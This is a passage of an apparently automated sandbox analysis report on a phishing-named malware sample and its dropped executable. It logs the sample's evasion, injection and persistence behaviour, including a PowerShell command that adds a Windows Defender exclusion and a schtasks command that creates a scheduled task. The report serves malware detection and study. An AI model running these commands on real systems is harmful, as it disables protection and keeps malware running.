                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: keHuNxIumw.exe PID: 1436, type: MEMORYSTR
                      Delayed program exit found
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: 19F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: 5370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: 9A10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: AA10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: AC30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: BC30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: 8E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: 74A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: 9E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory allocated: AE80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7840Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1754Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeWindow / User API: threadDelayed 368Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeWindow / User API: threadDelayed 9624Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeAPI coverage: 6.1 %
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 5300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616Thread sleep count: 368 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616Thread sleep time: -1104000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616Thread sleep count: 9624 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616Thread sleep time: -28872000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe TID: 6052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00443355 mov eax, dword ptr fs:[00000030h]12_2_00443355
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_004120B2 GetProcessHeap,HeapFree,12_2_004120B2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeMemory written: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeMemory written: C:\Users\user\AppData\Roaming\keHuNxIumw.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00412132
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00419662 mouse_event,12_2_00419662
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeProcess created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeProcess created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"Jump to behavior
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager.
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX
                      Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00434CB6 cpuid 12_2_00434CB6
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: EnumSystemLocalesW,12_2_0045201B
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: EnumSystemLocalesW,12_2_004520B6
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00452143
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoW,12_2_00452393
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: EnumSystemLocalesW,12_2_00448484
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004524BC
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoW,12_2_004525C3
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452690
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoW,12_2_0044896D
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: GetLocaleInfoA,12_2_0040F90C
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451D58
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: EnumSystemLocalesW,12_2_00451FD0
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
